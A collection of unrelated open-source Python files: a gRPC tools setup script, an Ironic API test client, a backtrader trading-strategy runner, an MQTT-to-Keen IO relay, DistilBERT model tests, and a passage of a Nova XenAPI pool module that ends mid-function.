GRPC_PYTHON_PROTO_RESOURCES_NAME)
proto_files = []
for proto_file in PROTO_FILES:
source = os.path.join(PROTO_INCLUDE, proto_file)
target = os.path.join(proto_resources_path, proto_file)
relative_target = os.path.join(GRPC_PYTHON_PROTO_RESOURCES_NAME,
proto_file)
try:
os.makedirs(os.path.dirname(target))
except OSError as error:
if error.errno == errno.EEXIST:
pass
else:
raise
shutil.copy(source, target)
proto_files.append(relative_target)
return {GRPC_PYTHON_TOOLS_PACKAGE: proto_files}
def extension_modules():
if BUILD_WITH_CYTHON:
plugin_sources = [os.path.join('grpc_tools', '_protoc_compiler.pyx')]
else:
plugin_sources = [os.path.join('grpc_tools', '_protoc_compiler.cpp')]
plugin_sources += [
os.path.join('grpc_tools', 'main.cc'),
os.path.join('grpc_root', 'src', 'compiler', 'python_generator.cc')
] + [os.path.join(CC_INCLUDE, cc_file) for cc_file in CC_FILES]
plugin_ext = extension.Extension(
name='grpc_tools._protoc_compiler',
sources=plugin_sources,
include_dirs=[
'.',
'grpc_root',
os.path.join('grpc_root', 'include'),
CC_INCLUDE,
],
language='c++',
define_macros=list(DEFINE_MACROS),
extra_compile_args=list(EXTRA_COMPILE_ARGS),
extra_link_args=list(EXTRA_LINK_ARGS),
)
extensions = [plugin_ext]
if BUILD_WITH_CYTHON:
from Cython import Build
return Build.cythonize(extensions)
else:
return extensions
setuptools.setup(name='grpcio-tools',
version=grpc_version.VERSION,
description='Protobuf code generator for gRPC',
long_description=open(_README_PATH, 'r').read(),
author='The gRPC Authors',
author_email='grpc-io@googlegroups.com',
url='https://grpc.io',
license='Apache License 2.0',
classifiers=CLASSIFIERS,
ext_modules=extension_modules(),
packages=setuptools.find_packages('.'),
python_requires='>=3.6',
install_requires=[
'protobuf>=3.5.0.post1, < 4.0dev',
'grpcio>={version}'.format(version=grpc_version.VERSION),
'setuptools',
],
package_data=package_data(),
cmdclass={
'build_ext': BuildExt,
})
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_serialization import jsonutils as json
import six
from six.moves.urllib import parse as urllib
from tempest.lib.common import rest_client
def handle_errors(f):
"""A decorator that allows to ignore certain types of errors."""
@functools.wraps(f)
def wrapper(*args, **kwargs):
param_name = 'ignore_errors'
ignored_errors = kwargs.get(param_name, tuple())
if param_name in kwargs:
del kwargs[param_name]
try:
return f(*args, **kwargs)
except ignored_errors:
# Silently ignore errors
pass
return wrapper
class BaremetalClient(rest_client.RestClient):
"""Base Tempest REST client for Ironic API."""
uri_prefix = ''
def serialize(self, object_dict):
"""Serialize an Ironic object."""
return json.dumps(object_dict)
def deserialize(self, object_str):
"""Deserialize an Ironic object."""
return json.loads(object_str)
def _get_uri(self, resource_name, uuid=None, permanent=False):
"""Get URI for a specific resource or object.
:param resource_name: The name of the REST resource, e.g., 'nodes'.
:param uuid: The unique identifier of an object in UUID format.
:returns: Relative URI for the resource or object.
"""
prefix = self.uri_prefix if not permanent else ''
return '{pref}/{res}{uuid}'.format(pref=prefix,
res=resource_name,
uuid='/%s' % uuid if uuid else '')
def _make_patch(self, allowed_attributes, **kwargs):
"""Create a JSON patch according to RFC 6902.
:param allowed_attributes: An iterable object that contains a set of
allowed attributes for an object.
:param **kwargs: Attributes and new values for them.
:returns: A JSON path that sets values of the specified attributes to
the new ones.
"""
def get_change(kwargs, path='/'):
for name, value in six.iteritems(kwargs):
if isinstance(value, dict):
for ch in get_change(value, path + '%s/' % name):
yield ch
else:
if value is None:
yield {'path': path + name,
'op': 'remove'}
else:
yield {'path': path + name,
'value': value,
'op': 'replace'}
patch = [ch for ch in get_change(kwargs)
if ch['path'].lstrip('/') in allowed_attributes]
return patch
def _list_request(self, resource, permanent=False, **kwargs):
"""Get the list of objects of the specified type.
:param resource: The name of the REST resource, e.g., 'nodes'.
:param **kwargs: Parameters for the request.
:returns: A tuple with the server response and deserialized JSON list
of objects
"""
uri = self._get_uri(resource, permanent=permanent)
if kwargs:
uri += "?%s" % urllib.urlencode(kwargs)
resp, body = self.get(uri)
self.expected_success(200, resp.status)
return resp, self.deserialize(body)
def _show_request(self, resource, uuid, permanent=False, **kwargs):
"""Gets a specific object of the specified type.
:param uuid: Unique identifier of the object in UUID format.
:returns: Serialized object as a dictionary.
"""
if 'uri' in kwargs:
uri = kwargs['uri']
else:
uri = self._get_uri(resource, uuid=uuid, permanent=permanent)
resp, body = self.get(uri)
self.expected_success(200, resp.status)
return resp, self.deserialize(body)
def _create_request(self, resource, object_dict):
"""Create an object of the specified type.
:param resource: The name of the REST resource, e.g., 'nodes'.
:param object_dict: A Python dict that represents an object of the
specified type.
:returns: A tuple with the server response and the deserialized created
object.
"""
body = self.serialize(object_dict)
uri = self._get_uri(resource)
resp, body = self.post(uri, body=body)
self.expected_success(201, resp.status)
return resp, self.deserialize(body)
def _delete_request(self, resource, uuid):
"""Delete specified object.
:param resource: The name of the REST resource, e.g., 'nodes'.
:param uuid: The unique identifier of an object in UUID format.
:returns: A tuple with the server response and the response body.
"""
uri = self._get_uri(resource, uuid)
resp, body = self.delete(uri)
self.expected_success(204, resp.status)
return resp, body
def _patch_request(self, resource, uuid, patch_object):
"""Update specified object with JSON-patch.
:param resource: The name of the REST resource, e.g., 'nodes'.
:param uuid: The unique identifier of an object in UUID format.
:returns: A tuple with the server response and the serialized patched
object.
"""
uri = self._get_uri(resource, uuid)
patch_body = json.dumps(patch_object)
resp, body = self.patch(uri, body=patch_body)
self.expected_success(200, resp.status)
return resp, self.deserialize(body)
@handle_errors
def get_api_description(self):
"""Retrieves all versions of the Ironic API."""
return self._list_request('', permanent=True)
@handle_errors
def get_version_description(self, version='v1'):
"""Retrieves the desctription of the API.
:param version: The version of the API. Default: 'v1'.
:returns: Serialized description of API resources.
"""
return self._list_request(version, permanent=True)
def _put_request(self, resource, put_object):
"""Update specified object with JSON-patch."""
uri = self._get_uri(resource)
put_body = json.dumps(put_object)
resp, body = self.put(uri, body=put_body)
self.expected_success([202, 204], resp.status)
return resp, body
| |
import sys
import os
import io
import base64
import matplotlib
matplotlib.use('Agg', warn=False, force=True)
import backtrader as bt
import matplotlib.pyplot as plt
from backtrader.plot.plot import Plot
from multiprocessing import Process, Queue
import logging
import pprint
import copy
import inspect
# must import first to initialize metaclass
from spfeed import SharpPointCSVData
from spbroker import SharpPointBroker
from spbacktester import SharpPointBackTester
import spstore
import strategy.strategylist
import datetime
from pytz import timezone
import traceback
import jitter
def check_params(kwargs, slist):
for s in slist:
if kwargs.get(s, None) is None or \
kwargs[s] == '':
raise ValueError('missing %s' % str(s))
def run_strategy(kwargs, q):
f = None
try:
check_params(kwargs, ['strategy', 'dataname', 'id'])
modpath = os.path.dirname(os.path.realpath(__file__))
logpath = os.path.join(modpath, '../data/log-%s.txt' %
(str(kwargs['id'])))
f = open(logpath, "a", 1)
stratargs = {}
module = strategy.strategylist.dispatch[kwargs['strategy']]
stratparams = module.params._getpairs()
for k, v in kwargs.items():
if k in stratparams:
s = stratparams[k]
if isinstance(s, int):
stratargs[k] = int(v)
elif isinstance(s, float):
stratargs[k] = float(v)
else:
stratargs[k] = v
stratargs['log'] = f
stratargs['strategy'] = module
cerebro = bt.Cerebro()
cerebro.addstrategy(**stratargs)
store = spstore.SharpPointStore(log=f)
broker = store.getbroker()
cerebro.setbroker(broker)
# Create a Data Feed
data = store.getdata(**kwargs)
data2 = bt.DataClone(dataname=data)
data2.addfilter(bt.ReplayerMinutes, compression=5)
cerebro.adddata(data)
cerebro.adddata(data2)
# Print out the starting conditions
print('Starting strategy "{}" at "{}"'.format(kwargs['strategy'],
datetime.datetime.now()),
file=f)
print('Using module file "{}"'.format(inspect.getsourcefile(module)),
file=f)
print('{}'.format(pprint.pformat(kwargs)), file=f)
# Run over everything
cerebro.run()
# Print out the final result
print('Finishing strategy "{}" at "{}"'.format(kwargs['strategy'],
datetime.datetime.now()),
file=f)
f.close()
q.put((kwargs['strategy'], kwargs['id'], "done", ""))
return None
except:
if f is not None:
print(traceback.format_exc(), file=f)
f.close()
print(traceback.format_exc())
q.put((kwargs['strategy'], kwargs['id'], "error",
repr(sys.exc_info())))
raise
def parse_date(s):
[d, t] = s.split()
l = [int(x) for x in d.split('-')] + [int(x) for x in t.split(':')]
return datetime.datetime(*l)
def run_backtest(kwargs):
check_params(kwargs, ['strategy', 'dataname'])
stratargs = {}
f = io.StringIO()
module = strategy.strategylist.dispatch[kwargs['strategy']]
stratparams = module.params._getpairs()
for k, v in kwargs.items():
if k in stratparams:
s = stratparams[k]
if isinstance(s, int):
stratargs[k] = int(v)
elif isinstance(s, float):
stratargs[k] = float(v)
else:
stratargs[k] = v
stratargs['log'] = f
stratargs['strategy'] = module
cerebro = bt.Cerebro()
cerebro.addstrategy(**stratargs)
store = spstore.SharpPointStore(log=f)
broker = store.getbroker(backtest=kwargs.get('backtest', True))
cerebro.setbroker(broker)
feedargs = copy.copy(kwargs)
if kwargs.get('backtest_start_time', '').strip() != '':
feedargs['fromdate'] = parse_date(kwargs['backtest_start_time'])
if kwargs.get('backtest_end_time', '').strip() != '':
feedargs['todate'] = parse_date(kwargs['backtest_end_time'])
# Create a Data Feed
data = store.getdata(**feedargs)
if float(kwargs['jitter']) >= 0.0:
data.addfilter(jitter.JitterFilter,
jitter=float(kwargs['jitter']))
data2 = bt.DataClone(dataname=data)
data2.addfilter(bt.ReplayerMinutes, compression=5)
cerebro.adddata(data)
cerebro.adddata(data2)
# Set the commission - 0.1% ... divide by 100 to remove the %
initial_cash = kwargs.get("initial_cash", None)
if initial_cash is not None:
cerebro.broker.setcash(float(initial_cash))
# cerebro.broker.setcommission(commission=0.0)
# Print out the starting conditions
print('Starting strategy "{}" at "{}"'.format(kwargs['strategy'],
datetime.datetime.now()),
file=f)
print('Using module file "{}"'.format(inspect.getsourcefile(module)),
file=f)
print('{}'.format(pprint.pformat(kwargs)), file=f)
print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue(), file=f)
# Run over everything
cerebro.run()
imgdata = io.BytesIO()
plot_type = kwargs.get("plot", "candle")
if plot_type != "none":
plotter = Plot(style='candle', bardownfill=False)
cerebro.plot(plotter)
plt.savefig(imgdata, format='svg')
# Print out the final result
print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue(),
file=f)
print('Finishing strategy "{}" at "{}"'.format(kwargs['strategy'],
datetime.datetime.now()),
file=f)
retval = """
<html>
<head>
<title>Backtest - {}</title>
</head>
<body>
""".format(kwargs['id'])
if plot_type != "none":
retval += '<img src="data:image/svg+xml;base64,%s" /><br>' % \
base64.b64encode(imgdata.getvalue()).decode('ascii')
retval += '<pre>%s</pre></body></html>' % f.getvalue()
imgdata.close()
plt.close('all')
f.close()
return retval
def run(kwargs):
q = Queue()
kwargs['newdata'] = True
kwargs['keepalive'] = True
if 'loglevel' not in kwargs:
kwargs['loglevel'] = logging.WARNING
kwargs['streaming'] = True
if 'tickersource' not in kwargs:
kwargs['tickersource'] = "ticker-%{instrument}.txt"
p = Process(target=run_strategy,
args=(kwargs, q))
p.daemon = True
p.start()
return (p, q)
def backtest(kwargs):
kwargs['newdata'] = False
kwargs['keepalive'] = False
if 'loglevel' not in kwargs:
kwargs['loglevel'] = logging.WARNING
kwargs['streaming'] = False
try:
return run_backtest(kwargs)
except:
return "<pre>" + traceback.format_exc() + "</pre>"
def strategy_list():
return list(strategy.strategylist.dispatch.keys())
def params(name):
return strategy.strategylist.dispatch[name].params._getpairs()
def headers(name):
my_headers = strategy.strategylist.dispatch[name].header_list()
defaultData = params(name)
for header in my_headers:
if 'defaultData' not in header and \
header['field'] in defaultData:
header['defaultData'] = defaultData[header['field']]
return my_headers
class TimeFilter(object):
def __init__(self, a, b):
self.start_time = self.string_to_seconds(a)
self.end_time = self.string_to_seconds(b)
@staticmethod
def string_to_seconds(s):
v = s.split(":")
r = int(v[0]) * 3600 + int(v[1]) * 60
if len(v) > 2:
r = r + int(v[2])
return r
@staticmethod
def seconds_from_midnight(d):
return (d - d.replace(hour=0, minute=0,
second=0, microsecond=0)).total_seconds()
def intervals(self, a):
ticktime_seconds = self.seconds_from_midnight(a)
return (ticktime_seconds, self.start_time, self.end_time)
def filter(self, a):
ticktime_seconds = self.seconds_from_midnight(a)
return (ticktime_seconds >= self.start_time and
ticktime_seconds <= self.end_time)
if __name__ == '__main__':
print(params('sample'))
print(params('sample').get('exitbars', None))
print(TimeFilter.string_to_seconds("14:30"))
run("sample", 1, {'exitbars': 1})
| |
""" Keen mqtt relay class """
import paho.mqtt.client as mqtt
import keen
import json
from datetime import datetime
import logging
logger = logging.getLogger('keenmqtt')
class KeenMQTT:
def __init__(self):
self.ready = False
self.running = False
self.collection_mapping = {}
def setup(self, mqtt_client=None, keen_client=None, settings=None):
"""Setup the clients for this instance.
Normally called with a settings object containing `keen` and `mqtt` keys
with dictionary values of settings.
Args:
mqtt_client Optional[class]: An instance of an Paho MQTT client class.
keen_client Optional[class]: An instance of a KeenClient.
settings Optional[dict]: A settings dict, normally loaded from a config.yaml file.
Return:
None
"""
if mqtt_client:
self.mqtt_client = mqtt_client
self.register_subscriptions()
else:
self.connect_mqtt_client(settings)
if keen_client:
self.keen_client = keen_client
else:
self.connect_keen(settings)
if 'collection_mappings' in settings:
for subscription in settings['collection_mappings']:
collection = settings['collection_mappings'][subscription]
self.add_collection_mapping(subscription, collection)
self.ready = True
def connect_mqtt_client(self, settings):
"""Setup MQTT client.
Please note that the MQTT client will not actually connect until either ``step`` or ``start``
has been called.
Args:
settings Optional[dict]: The settings object, such as one read from config.yaml
Return:
None
"""
mqtt_settings = settings['mqtt']
if 'client_id' not in mqtt_settings:
import uuid
mqtt_settings['client_id'] = str(uuid.uuid4())
self.mqtt_client = mqtt.Client(mqtt_settings['client_id'])
self.mqtt_client.on_message = self.on_mqtt_message
self.mqtt_client.on_connect = self.on_mqtt_connect
if 'user' in mqtt_settings and len(mqtt_settings['user']):
self.mqtt_client.username_pw_set(mqtt_settings['user'], mqtt_settings['pass'])
self.mqtt_client.connect(mqtt_settings['host'], mqtt_settings['port'])
def connect_keen(self, settings):
"""Setup the Keen IO client.
Args:
settings Optional[dict]: The settings object, such as one read from config.yaml
Return:
None
"""
if 'keen' in settings:
self.keen_client = keen.KeenClient(**settings['keen'])
else:
self.keen_client = keen
def on_mqtt_connect(self, c, client, userdata, rc):
"""Called when an MQTT connection is made.
See the Paha MQTT client documentation ``on_connect`` documentation for arguments.
"""
logger.info("MQTT Client connected")
self.register_subscriptions()
self.ready = True
def register_subscriptions(self):
"""This should always be called since re-subscribes after any
unexpected disconnects.
"""
for subscription in self.collection_mapping:
self.mqtt_client.subscribe(subscription)
def on_mqtt_message(self, mosq, obj, mqtt_message):
"""Called when an MQTT message is recieved.
See the Paha MQTT client documentation ``on_message`` documentation for arguments.
"""
topic = mqtt_message.topic
payload = mqtt_message.payload
messages = self.decode_payload(topic, payload)
if len(messages):
for message in messages:
event = {}
collection = self.process_collection(topic, message)
if collection:
if self.process_topic(event, topic):
if self.process_payload(event, topic, message):
if self.process_time(event, topic, message):
self.push_event(collection, event)
def start(self):
"""Automatically loop in a background thread."""
self.running = True
self.mqtt_client.loop_start()
def stop(self):
"""Disconnect and stop. """
self.mqtt_client.loop_stop()
self.running = False
def step(self):
"""Do a single MQTT step.
Use this if you're not running keenmqtt in a background thread with ``start``/``stop``
"""
if self.running:
raise BackgroundRunningException("Cannot perform a step whilst background loop is running.")
self.mqtt_client.loop()
def process_topic(self, event, topic):
"""Process an incoming MQTT message's topic string.
If the topic contains pertinant information, such as the device ID or location,
this method can be overriden to perform any translation. By default, a key called
``mqtt_topic`` containing the topic string will be added to the event dictionary.
Args:
event (dict): The event dictionary for this mqtt message.
topic (str): The topic string.
Return:
bool: A Boolean indicating if this message should continue through the pipeline. Return
``False`` to cancel the processing of this event and stop it from being saved in keen.
"""
event['mqtt_topic'] = topic
return True
def process_collection(self, topic, message):
"""Assign a collection to the MQTT message.
By default will find a matching topic in the collection_mapping dictionary and return
the associated string. Could also be based on event contents.
Args:
event (dict): The event dictionary for this mqtt message.
topic (str): The topic string.
Return:
str: A string indicating the Keen IO collection which this event should be pushed to, or
false if a matching event collection could not be found.
"""
for subscription in self.collection_mapping:
if mqtt.topic_matches_sub(subscription, topic):
return self.collection_mapping[subscription]
return False
def add_collection_mapping(self,sub,collection):
"""Add a subcription to event collection mapping.
This will overide existing subscriptions if present.
Args:
sub (str): The string subscription pattern.
collection (str): The sting event collection.
Return:
None
"""
self.collection_mapping[sub] = collection
def decode_payload(self, topic, payload):
"""Decode the payload of an incoming MQTT payload.
By default a JSON object is expected, however this method can be overriden to provide
alternative means to extract a MQTT payload. For example, a binary format could be
extracted here.
Args:
topic (str): The topic string.
payload (str): Raw MQTT payload.
Returns:
An array of dictionaries containing the decoded MQTT payload.
Raises:
ValueError: Whent the JSON payload cannot be parsed.
"""
return [json.loads(payload)]
def process_payload(self, event, topic, message):
"""Process an incoming MQTT message's payload.
Perform any required translations to the payload of the MQTT message, such as removing
Args:
event (dict): The event dictionary for this mqtt message.
topic (str): The topic string.
message (dict): the decoded MQTT payload
Returns:
bool: A Boolean indicating if this message should continue through the pipeline. Return
``False`` to cancel the processing of this event and stop it from being saved in Keen IO.
"""
event.update(message)
return True
def process_time(self, event, topic, message):
"""Process the timestamp which will be sent to Keen IO.
If the MQTT message contains time information which should be used instead of the event being
timestamped by Keen IO, set it here.
Args:
event (dict): The event dictionary for this mqtt message.
topic (str): The topic string.
message (dict): The message dictionary.
Returns:
bool: A Boolean indicating if this message should continue through the pipeline. Return
``False`` to cancel the processing of this event and stop it from being saved in Keen IO.
"""
iso_datetime = self.get_time(topic, message)
if iso_datetime is not None:
event['keen'] = {
"timestamp": iso_datetime
}
return True
def get_time(self, topic, message):
"""Get the timestamp to send to Keen IO.
This method is used to extract the timestamp from the MQTT message if required,
or to generate a timestamp. By default, the current time will be fetched.
Args:
topic (str): The topic string.
message (dict): The message dictionary.
Returns:
str: A string containing ISO-8601 string.
"""
return datetime.now().isoformat()
def push_event(self, collection, event):
"""Thin wrapper around Keen IO API object.
Args:
collection (str): The collection string to push to
event (dict): The complete event to push
Returns:
None
"""
assert self.ready == True
logger.debug("Saving event to collection {collection}: '{event}'".format(collection=collection, event=event))
self.keen_client.add_event(collection, event)
class BackgroundRunningException(Exception):
""" Used when the user tries to run in the foreground whilst
a background loop is already running."""
pass
| |
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
DISTILBERT_PRETRAINED_MODEL_ARCHIVE_LIST,
DistilBertConfig,
DistilBertForMaskedLM,
DistilBertForMultipleChoice,
DistilBertForQuestionAnswering,
DistilBertForSequenceClassification,
DistilBertForTokenClassification,
DistilBertModel,
)
class DistilBertModelTester(object):
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_input_mask=True,
use_token_type_ids=False,
use_labels=True,
vocab_size=99,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_labels=3,
num_choices=4,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_input_mask = use_input_mask
self.use_token_type_ids = use_token_type_ids
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_labels = num_labels
self.num_choices = num_choices
self.scope = scope
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = random_attention_mask([self.batch_size, self.seq_length])
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = DistilBertConfig(
vocab_size=self.vocab_size,
dim=self.hidden_size,
n_layers=self.num_hidden_layers,
n_heads=self.num_attention_heads,
hidden_dim=self.intermediate_size,
hidden_act=self.hidden_act,
dropout=self.hidden_dropout_prob,
attention_dropout=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
initializer_range=self.initializer_range,
)
return config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
def create_and_check_distilbert_model(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = DistilBertModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, input_mask)
result = model(input_ids)
self.parent.assertEqual(
result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size)
)
def create_and_check_distilbert_for_masked_lm(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = DistilBertForMaskedLM(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, labels=token_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_distilbert_for_question_answering(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = DistilBertForQuestionAnswering(config=config)
model.to(torch_device)
model.eval()
result = model(
input_ids, attention_mask=input_mask, start_positions=sequence_labels, end_positions=sequence_labels
)
self.parent.assertEqual(result.start_logits.shape, (self.batch_size, self.seq_length))
self.parent.assertEqual(result.end_logits.shape, (self.batch_size, self.seq_length))
def create_and_check_distilbert_for_sequence_classification(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.num_labels = self.num_labels
model = DistilBertForSequenceClassification(config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, labels=sequence_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def create_and_check_distilbert_for_token_classification(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.num_labels = self.num_labels
model = DistilBertForTokenClassification(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, labels=token_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.num_labels))
def create_and_check_distilbert_for_multiple_choice(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.num_choices = self.num_choices
model = DistilBertForMultipleChoice(config=config)
model.to(torch_device)
model.eval()
multiple_choice_inputs_ids = input_ids.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
multiple_choice_input_mask = input_mask.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()
result = model(
multiple_choice_inputs_ids,
attention_mask=multiple_choice_input_mask,
labels=choice_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_choices))
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(config, input_ids, input_mask, sequence_labels, token_labels, choice_labels) = config_and_inputs
inputs_dict = {"input_ids": input_ids, "attention_mask": input_mask}
return config, inputs_dict
@require_torch
class DistilBertModelTest(ModelTesterMixin, unittest.TestCase):
all_model_classes = (
(
DistilBertModel,
DistilBertForMaskedLM,
DistilBertForMultipleChoice,
DistilBertForQuestionAnswering,
DistilBertForSequenceClassification,
DistilBertForTokenClassification,
)
if is_torch_available()
else None
)
fx_ready_model_classes = all_model_classes
test_pruning = True
test_torchscript = True
test_resize_embeddings = True
test_sequence_classification_problem_types = True
def setUp(self):
self.model_tester = DistilBertModelTester(self)
self.config_tester = ConfigTester(self, config_class=DistilBertConfig, dim=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_distilbert_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_distilbert_model(*config_and_inputs)
def test_for_masked_lm(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_distilbert_for_masked_lm(*config_and_inputs)
def test_for_question_answering(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_distilbert_for_question_answering(*config_and_inputs)
def test_for_sequence_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_distilbert_for_sequence_classification(*config_and_inputs)
def test_for_token_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_distilbert_for_token_classification(*config_and_inputs)
def test_for_multiple_choice(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_distilbert_for_multiple_choice(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in DISTILBERT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = DistilBertModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@require_torch
class DistilBertModelIntergrationTest(unittest.TestCase):
@slow
def test_inference_no_head_absolute_embedding(self):
model = DistilBertModel.from_pretrained("distilbert-base-uncased")
input_ids = torch.tensor([[0, 345, 232, 328, 740, 140, 1695, 69, 6078, 1588, 2]])
attention_mask = torch.tensor([[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])
output = model(input_ids, attention_mask=attention_mask)[0]
expected_shape = torch.Size((1, 11, 768))
self.assertEqual(output.shape, expected_shape)
expected_slice = torch.tensor(
[[[-0.1639, 0.3299, 0.1648], [-0.1746, 0.3289, 0.1710], [-0.1884, 0.3357, 0.1810]]]
)
self.assertTrue(torch.allclose(output[:, 1:4, 1:4], expected_slice, atol=1e-4))
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
# Copyright 2010 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for Pool-related functions (join, eject, etc).
"""
import json
import urlparse
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova import rpc
from nova.compute import aggregate_states
from nova.openstack.common import cfg
from nova.virt.xenapi import vm_utils
LOG = logging.getLogger("nova.virt.xenapi.pool")
xenapi_pool_opts = [
cfg.BoolOpt('use_join_force',
default=True,
help='To use for hosts with different CPUs'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(xenapi_pool_opts)
class ResourcePool(object):
"""
Implements resource pool operations.
"""
def __init__(self, session):
self.XenAPI = session.get_imported_xenapi()
host_ref = session.get_xenapi_host()
host_rec = session.call_xenapi('host.get_record', host_ref)
self._host_name = host_rec['hostname']
self._host_addr = host_rec['address']
self._host_uuid = host_rec['uuid']
self._session = session
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
if len(aggregate.hosts) == 1:
# this is the first host of the pool -> make it main
self._init_pool(aggregate.id, aggregate.name)
# save metadata so that we can find the main again
values = {
'operational_state': aggregate_states.ACTIVE,
'metadata': {'main_compute': host,
host: self._host_uuid},
}
db.aggregate_update(context, aggregate.id, values)
else:
# the pool is already up and running, we need to figure out
# whether we can serve the request from this host or not.
main_compute = aggregate.metadetails['main_compute']
if main_compute == FLAGS.host and main_compute != host:
# this is the main -> do a pool-join
# To this aim, nova compute on the subordinate has to go down.
# NOTE: it is assumed that ONLY nova compute is running now
self._join_subordinate(aggregate.id, host,
kwargs.get('compute_uuid'),
kwargs.get('url'), kwargs.get('user'),
kwargs.get('passwd'))
metadata = {host: kwargs.get('xenhost_uuid'), }
db.aggregate_metadata_add(context, aggregate.id, metadata)
elif main_compute and main_compute != host:
# send rpc cast to main, asking to add the following
# host with specified credentials.
forward_request(context, "add_aggregate_host", main_compute,
aggregate.id, host,
self._host_addr, self._host_uuid)
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
main_compute = aggregate.metadetails.get('main_compute')
if main_compute == FLAGS.host and main_compute != host:
# this is the main -> instruct it to eject a host from the pool
host_uuid = db.aggregate_metadata_get(context, aggregate.id)[host]
self._eject_subordinate(aggregate.id,
kwargs.get('compute_uuid'), host_uuid)
db.aggregate_metadata_delete(context, aggregate.id, host)
elif main_compute == host:
# Remove main from its own pool -> destroy pool only if the
# main is on its own, otherwise raise fault. Destroying a
# pool made only by main is fictional
if len(aggregate.hosts) > 1:
# NOTE: this could be avoided by doing a main
# re-election, but this is simpler for now.
